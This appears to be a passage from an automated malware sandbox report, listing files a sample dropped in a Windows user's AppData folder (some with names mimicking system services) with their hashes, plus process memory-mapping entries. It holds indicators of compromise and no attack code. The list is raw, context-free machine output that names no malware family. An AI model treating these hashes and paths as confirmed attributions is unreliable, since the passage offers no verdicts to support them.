MD5f87fd290c2d08ede25d6a8def9657c07
SHA1930e7f35e0d5a43faf19ad75bc41c7efce914a17
SHA256a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf
SHA5120093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07
-
C:\Users\Admin\AppData\Roaming\9.exeFilesize
4.2MB
MD5b60e44033994d1fde9a4b6f1338bfa04
SHA17f2cd8091276040ca011174269112099ec3e9bef
SHA256baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e
SHA512a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574
-
C:\Users\Admin\AppData\Roaming\9.exeFilesize
4.2MB
MD5b60e44033994d1fde9a4b6f1338bfa04
SHA17f2cd8091276040ca011174269112099ec3e9bef
SHA256baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e
SHA512a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574
-
C:\Users\Admin\AppData\Roaming\HJDS32.EXEFilesize
532KB
MD589d77a6e1e3a08f6cbb5b440c8f47e29
SHA1b9f2db35241435b4ceed98b58b63918a6f4ce2e2
SHA2569f6badc3fdae2eec00ce41e5c07ccaef97eb9805d13328a1589e36fd1890181c
SHA512c6102fd3cc8438292a222583f40358e2039fab534765ed2f07e056df36c8f609ef51b55c782baaeeb1d2124b3aed5ebfbb9875dc136e560220a8339393c594e2
-
C:\Users\Admin\AppData\Roaming\HJDS32.EXEFilesize
532KB
MD589d77a6e1e3a08f6cbb5b440c8f47e29
SHA1b9f2db35241435b4ceed98b58b63918a6f4ce2e2
SHA2569f6badc3fdae2eec00ce41e5c07ccaef97eb9805d13328a1589e36fd1890181c
SHA512c6102fd3cc8438292a222583f40358e2039fab534765ed2f07e056df36c8f609ef51b55c782baaeeb1d2124b3aed5ebfbb9875dc136e560220a8339393c594e2
-
C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exeFilesize
87KB
MD5416111b00225448d637271b38b2ced81
SHA131cb7553da6fbf930630cafac8a8c99286970dc2
SHA2562f55a4df8314ecf86a36a38bb76af6f4663ecd0b02639c3c071247c93054f8ae
SHA51274c07dcccaf4c1a8823a345c627932c7f9845b224f71983d17cd162c247e1a16e62c820615e3929a12ef708d13d06d4b9309f12e7b082439fe3e3df81d7ef3b2
-
C:\Users\Admin\AppData\Roaming\WHost\WHost.exeFilesize
87KB
MD52b886cf83705877c1fae3a07a6c4339e
SHA1e37e62c7fda4f467e4ae7dbba04d631f08a5a3dd
SHA2568d0c4f891f01840c2a9c6483554d661440bb6a81fe86f10d546c697fb9e958a5
SHA512a70165c38ade58ea1c2b9b20dba717364d4062735b63b00af4cc6adea967df9bc0a8be98c5b8ae4a9a968661e0ccc48fdb4c7d5c75e5c4303131e4e175a0a7b2
-
C:\Users\Admin\AppData\Roaming\yQKALotXEZ\wXDStJGKiy.exeFilesize
68KB
MD5b2039684208ca1a2c62b998de4c60917
SHA18c287a28c0aa74ccfa239d9af9611a3be1f39467
SHA2565629471239d4e9ef5585ea8ee2707cb6d029a62f834e02d2110657bc30842638
SHA5127f73b48457f3e0428b9c19228141521a6b867e15741822094701d967da9e783ff69f6b56fc808cb15e33fa1789796c4ff0f3ed719faf4a25becda5e831a41d55
-
\??\c:\users\admin\appdata\roaming\5.exeFilesize
68KB
MD5b2039684208ca1a2c62b998de4c60917
SHA18c287a28c0aa74ccfa239d9af9611a3be1f39467
SHA2565629471239d4e9ef5585ea8ee2707cb6d029a62f834e02d2110657bc30842638
SHA5127f73b48457f3e0428b9c19228141521a6b867e15741822094701d967da9e783ff69f6b56fc808cb15e33fa1789796c4ff0f3ed719faf4a25becda5e831a41d55
-
memory/512-171-0x0000000000000000-mapping.dmp
-
memory/1028-213-0x0000000000000000-mapping.dmp
-
memory/1028-241-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/1036-133-0x0000000000000000-mapping.dmp
-
memory/1276-264-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/1276-252-0x0000000000000000-mapping.dmp
-
memory/1304-324-0x0000000000000000-mapping.dmp
-
memory/1316-212-0x0000000000240000-0x0000000000248000-memory.dmpFilesize
32KB
-
memory/1316-208-0x0000000000000000-mapping.dmp
-
memory/1316-227-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/1344-188-0x0000000000000000-mapping.dmp
-
memory/1396-173-0x0000000000000000-mapping.dmp
-
memory/1480-132-0x0000000000600000-0x00000000006AA000-memory.dmpFilesize
680KB
-
memory/1592-233-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/1592-218-0x00000000009D0000-0x00000000009D8000-memory.dmpFilesize
32KB
-
memory/1592-228-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/1592-214-0x0000000000000000-mapping.dmp
-
memory/1608-152-0x0000000000000000-mapping.dmp
-
memory/1608-155-0x0000000000AD0000-0x0000000000AF6000-memory.dmpFilesize
152KB
-
memory/1628-253-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/1628-229-0x0000000000000000-mapping.dmp
-
memory/1652-260-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/1652-247-0x00000000006D0000-0x00000000006D8000-memory.dmpFilesize
32KB
-
memory/1652-242-0x0000000000000000-mapping.dmp
-
memory/1688-322-0x0000000000000000-mapping.dmp
-
memory/1804-232-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/1804-196-0x0000000000000000-mapping.dmp
-
memory/2012-146-0x00007FF71DB30000-0x00007FF71DC8F000-memory.dmpFilesize
1.4MB
-
memory/2012-143-0x00007FF71DB30000-0x00007FF71DC8F000-memory.dmpFilesize
1.4MB
-
memory/2012-140-0x0000000000000000-mapping.dmp
-
memory/2236-193-0x0000000000C10000-0x0000000000C18000-memory.dmpFilesize
32KB
-
memory/2236-207-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/2236-199-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/2236-190-0x0000000000000000-mapping.dmp
-
memory/2264-136-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/2264-135-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/2264-134-0x0000000000000000-mapping.dmp
-
memory/2264-137-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/2264-139-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/2264-144-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/2280-332-0x0000000000000000-mapping.dmp
-
memory/2468-172-0x0000000000000000-mapping.dmp
-
memory/2468-272-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/2468-183-0x000002033EF90000-0x000002033EFB2000-memory.dmpFilesize
136KB
-
memory/2468-206-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/2640-167-0x0000000000000000-mapping.dmp
-
memory/2640-170-0x0000000000F00000-0x0000000000F08000-memory.dmpFilesize
32KB
-
memory/2640-181-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/2652-251-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/2652-201-0x0000000000000000-mapping.dmp
-
memory/2652-237-0x0000000000040000-0x0000000000048000-memory.dmpFilesize
32KB
-
memory/2652-231-0x0000000000000000-mapping.dmp
-
memory/2652-219-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/2652-254-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/2652-204-0x0000000000EB0000-0x0000000000EB8000-memory.dmpFilesize
32KB
-
memory/2704-151-0x0000000000000000-mapping.dmp
-
memory/2716-326-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/2716-325-0x0000000000000000-mapping.dmp
-
memory/2744-161-0x0000000000000000-mapping.dmp
-
memory/2744-166-0x0000000000E20000-0x0000000000E28000-memory.dmpFilesize
32KB
-
memory/2744-174-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/3164-200-0x0000000000000000-mapping.dmp
-
memory/3404-274-0x0000000006590000-0x0000000006606000-memory.dmpFilesize
472KB
-
memory/3404-281-0x0000000006880000-0x000000000689E000-memory.dmpFilesize
120KB
-
memory/3404-261-0x00000000068B0000-0x0000000006DDC000-memory.dmpFilesize
5.2MB
-
memory/3404-262-0x0000000006140000-0x00000000061A6000-memory.dmpFilesize
408KB
-
memory/3404-187-0x0000000005150000-0x000000000525A000-memory.dmpFilesize
1.0MB
-
memory/3404-259-0x00000000061B0000-0x0000000006372000-memory.dmpFilesize
1.8MB
-
memory/3404-159-0x0000000005400000-0x0000000005A18000-memory.dmpFilesize
6.1MB
-
memory/3404-266-0x0000000007390000-0x0000000007934000-memory.dmpFilesize
5.6MB
-
memory/3404-157-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3404-156-0x0000000000000000-mapping.dmp
-
memory/3404-160-0x0000000004E40000-0x0000000004E52000-memory.dmpFilesize
72KB
-
memory/3404-277-0x00000000066B0000-0x0000000006742000-memory.dmpFilesize
584KB
-
memory/3404-165-0x0000000004EA0000-0x0000000004EDC000-memory.dmpFilesize
240KB
-
memory/3408-164-0x0000000000000000-mapping.dmp
-
memory/3412-371-0x0000000000000000-mapping.dmp
-
memory/3412-195-0x0000000000000000-mapping.dmp
-
memory/3412-372-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/3508-186-0x00000000009B0000-0x00000000009B8000-memory.dmpFilesize
32KB
-
memory/3508-198-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/3508-182-0x0000000000000000-mapping.dmp
-
memory/3552-205-0x0000000000000000-mapping.dmp
-
memory/3552-239-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/3824-376-0x0000000000000000-mapping.dmp
-
memory/4016-180-0x0000000000000000-mapping.dmp
-
memory/4192-158-0x0000000000000000-mapping.dmp
-
memory/4216-230-0x0000000000000000-mapping.dmp
-
memory/4292-145-0x0000000000000000-mapping.dmp
-
memory/4360-244-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/4360-220-0x0000000000000000-mapping.dmp
-
memory/4520-263-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/4520-236-0x0000000000000000-mapping.dmp
-
memory/4532-224-0x0000000000100000-0x0000000000108000-memory.dmpFilesize
32KB
-
memory/4532-240-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/4532-221-0x0000000000000000-mapping.dmp
-
memory/4564-317-0x0000000000000000-mapping.dmp
-
memory/4652-209-0x0000000000000000-mapping.dmp
-
memory/4772-329-0x0000000000000000-mapping.dmp
-
memory/4784-250-0x00000000007C0000-0x00000000007C8000-memory.dmpFilesize
32KB
-
memory/4784-243-0x0000000000000000-mapping.dmp
-
memory/4784-255-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/4784-258-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/4792-179-0x0000000000230000-0x0000000000238000-memory.dmpFilesize
32KB
-
memory/4792-175-0x0000000000000000-mapping.dmp
-
memory/4792-194-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/4816-215-0x0000000000000000-mapping.dmp
-
memory/4836-352-0x0000000000000000-mapping.dmp
-
memory/4896-197-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/4896-178-0x0000000000000000-mapping.dmp
-
memory/4968-238-0x00007FF68BF60000-0x00007FF68C0C1000-memory.dmpFilesize
1.4MB
-
memory/4968-150-0x00007FF68BF60000-0x00007FF68C0C1000-memory.dmpFilesize
1.4MB
-
memory/4968-147-0x0000000000000000-mapping.dmp
-
memory/5036-189-0x0000000000000000-mapping.dmp
-
memory/5036-226-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/5060-225-0x0000000000000000-mapping.dmp
-
memory/5144-358-0x0000000000000000-mapping.dmp
-
memory/5180-310-0x0000000000000000-mapping.dmp
-
memory/5216-365-0x0000000000000000-mapping.dmp
-
memory/5244-256-0x0000000000000000-mapping.dmp
-
memory/5244-265-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/5280-257-0x0000000000000000-mapping.dmp
-
memory/5280-267-0x00007FF8B1FC0000-0x00007FF8B2A81000-memory.dmpFilesize
10.8MB
-
memory/5496-388-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/5528-380-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/5868-344-0x0000000000000000-mapping.dmp
-
memory/5868-268-0x0000000000000000-mapping.dmp
-
memory/5868-271-0x0000000000670000-0x000000000068C000-memory.dmpFilesize
112KB
-
memory/5916-350-0x0000000000000000-mapping.dmp
-
memory/5920-279-0x0000000004780000-0x00000000047B6000-memory.dmpFilesize
216KB
-
memory/5920-273-0x0000000000000000-mapping.dmp
-
memory/5920-282-0x0000000004DF0000-0x0000000005418000-memory.dmpFilesize
6.2MB
-
memory/5948-340-0x0000000000000000-mapping.dmp
-
memory/5960-275-0x0000000000000000-mapping.dmp
-
memory/5984-278-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/5984-276-0x0000000000000000-mapping.dmp
-
memory/6096-280-0x0000000000000000-mapping.dmp